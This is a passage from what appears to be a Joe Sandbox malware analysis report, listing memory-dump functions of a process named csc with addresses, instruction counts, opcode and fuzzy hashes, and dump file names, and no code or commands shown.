                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 30831897313c9a92440b5b6252fcc6de89d81ece0382ceaf17a941c18de45761
                                                                                                                                              • Instruction ID: 930f35acf461d784955db467466bb6d355f6e17235a3284ff34b2ec4695572b5
                                                                                                                                              • Opcode Fuzzy Hash: 30831897313c9a92440b5b6252fcc6de89d81ece0382ceaf17a941c18de45761
                                                                                                                                              • Instruction Fuzzy Hash: EDE07D3074C3049BC7306E74491175632CCBF85751F94C42CE605EF2E0F862D8008351
                                                                                                                                              Function 0993C9D9 Relevance: .0, Instructions: 22COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3a00a94d66408351ea417ae582c0c88280e1b93c115a806ba023e46273633f76
                                                                                                                                              • Instruction ID: 2769b87ddb42508d33a80f8da9ebe76ead0b067f4996ef56a6d53719dfef0ff9
                                                                                                                                              • Opcode Fuzzy Hash: 3a00a94d66408351ea417ae582c0c88280e1b93c115a806ba023e46273633f76
                                                                                                                                              • Instruction Fuzzy Hash: 46E0D832905588CACB15DE78A8440ACBB70FBA2316B44C2AFE4C56A001F730905AC751
                                                                                                                                              Function 09938AF7 Relevance: .0, Instructions: 21COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e5f3e802a4bef3844ed30b3ec1b9b14d89fcdd2380abe70342d129cbc73e9b50
                                                                                                                                              • Instruction ID: 7c6ab3408b4f0f0120cf971769535dc1bd6f8e65cc9039b3f2b3eff00802df6a
                                                                                                                                              • Opcode Fuzzy Hash: e5f3e802a4bef3844ed30b3ec1b9b14d89fcdd2380abe70342d129cbc73e9b50
                                                                                                                                              • Instruction Fuzzy Hash: C7E0CD313097834FD75ACE35F921557BBE59FC5300314457ED082CB155EA24D846CB41
                                                                                                                                              Function 0A5D4B30 Relevance: .0, Instructions: 15COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_a5d0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 95f78b17757e4d80713be30ed19e76111502fd66cdeab860e9557540a19a2592
                                                                                                                                              • Instruction ID: 418c8bb94ff39a70ece1b3dce5a61771caca902cc758b0649f6c1ce9551e2087
                                                                                                                                              • Opcode Fuzzy Hash: 95f78b17757e4d80713be30ed19e76111502fd66cdeab860e9557540a19a2592
                                                                                                                                              • Instruction Fuzzy Hash: D9D0C9306502088B9B009AA8F86997677AAF7C4A293184468A20DC75B1EB35EC518A50
                                                                                                                                              Function 0993E5E8 Relevance: .0, Instructions: 15COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6b51c3c49bc9ab5bf95eb08098cef88ff6f3cdd824f07d5a37ced783cb60fe5a
                                                                                                                                              • Instruction ID: 1d3cc54b06633064d32194ec50f93f97bb1bca715aa3a38bbcb187601547a3f5
                                                                                                                                              • Opcode Fuzzy Hash: 6b51c3c49bc9ab5bf95eb08098cef88ff6f3cdd824f07d5a37ced783cb60fe5a
                                                                                                                                              • Instruction Fuzzy Hash: 91D01C3215A380AFC38A8B70E4418A97FB0AF5622132640EAE04A8B2B2C2628850CA10
                                                                                                                                              Function 0A5D6AA0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_a5d0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: da30a40ae9da2747aa0bcd915d13c43987ec4146c3b12df71a15932d9c5668c9
                                                                                                                                              • Instruction ID: 4265a976d7e8b7a9190c5b19758b734707d0c966f6ae11a252691a188861502b
                                                                                                                                              • Opcode Fuzzy Hash: da30a40ae9da2747aa0bcd915d13c43987ec4146c3b12df71a15932d9c5668c9
                                                                                                                                              • Instruction Fuzzy Hash: 5AC08C30300308CB9B94ABBAB48C46A73DFFFC492A308C464F14DC3A15EB32E8139941
                                                                                                                                              Function 095E3EED Relevance: .0, Instructions: 11COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994531294.00000000095E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095E0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_95e0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 558b4194d79ff1d79899ad8a3fc31391761ff146f13515d1371ca748dd625553
                                                                                                                                              • Instruction ID: b48c4aa8898cfb20e21ef38be0ffab413523c50d62497fff7f247177e50e0282
                                                                                                                                              • Opcode Fuzzy Hash: 558b4194d79ff1d79899ad8a3fc31391761ff146f13515d1371ca748dd625553
                                                                                                                                              • Instruction Fuzzy Hash: 2CD01234E040548BD7096B52CE5463C77F5BB44380F014491D803DF204EA76CC018A01
                                                                                                                                              Function 0A5D6A6F Relevance: .0, Instructions: 9COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_a5d0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 693ab1bc620fe974db707e3b1a5045e384bbd5c91a42e3ebca8f17662d619140
                                                                                                                                              • Instruction ID: 237e54d1b712a7e14834de346fcb03ff2d8a037aa210c2e9acbaa6fe79a53da6
                                                                                                                                              • Opcode Fuzzy Hash: 693ab1bc620fe974db707e3b1a5045e384bbd5c91a42e3ebca8f17662d619140
                                                                                                                                              • Instruction Fuzzy Hash: F9C0480928FAC04ECB035B3E88292E0BFB4AC47118B8D46C7C0C4DE8A3C6945404ABAA
                                                                                                                                              Function 095E1628 Relevance: .0, Instructions: 7COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994531294.00000000095E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095E0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_95e0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b3023cf2993060707b7ca2133246f05823ab6a4158bce7a47f2086cbf91b8767
                                                                                                                                              • Instruction ID: d6f279a24b59d47738cc3b8a1e56a3e3d98124c335fc495c057f27b187f5950a
                                                                                                                                              • Opcode Fuzzy Hash: b3023cf2993060707b7ca2133246f05823ab6a4158bce7a47f2086cbf91b8767
                                                                                                                                              • Instruction Fuzzy Hash: C8A0112008820C8A82C033F2382AF08B30CAE80000B808020E20C822022FAFA80002BB
                                                                                                                                              Function 09938AF0 Relevance: .0, Instructions: 2COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c289d1a75c4e2078ed7eece625d375a455ccfb991979859db5c7165dc2264d23
                                                                                                                                              • Instruction ID: 4efc78841dfcbd8b773fac3a533143372b69bc9a62142b952b59124738bd76bd
                                                                                                                                              • Opcode Fuzzy Hash: c289d1a75c4e2078ed7eece625d375a455ccfb991979859db5c7165dc2264d23
                                                                                                                                              • Instruction Fuzzy Hash: